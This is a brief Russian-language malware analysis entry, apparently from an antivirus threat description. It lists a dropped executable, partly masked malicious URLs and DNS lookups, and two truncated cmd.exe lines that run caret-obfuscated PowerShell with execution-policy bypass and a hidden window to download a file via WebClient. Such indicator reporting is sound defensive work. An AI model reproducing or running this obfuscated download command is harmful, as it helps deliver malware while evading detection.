Техническая информация
- %LOCALAPPDATA%\templel61.exe
- http://dr####.##artwebsitedesign.com/local.php
- http://dr####.##artwebsitedesign.com/cgi-sys/suspendedpage.cgi
- DNS ASK dr####.##artwebsitedesign.com
- '<SYSTEM32>\cmd.exe' /c pOwEr^shEll -ex^ecution^pol^icy b^ypa^ss -n^oprof^ile -w h^idd^en $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('ht...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c pOwEr^shEll -ex^ecution^pol^icy b^ypa^ss -n^oprof^ile -w h^idd^en $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('ht...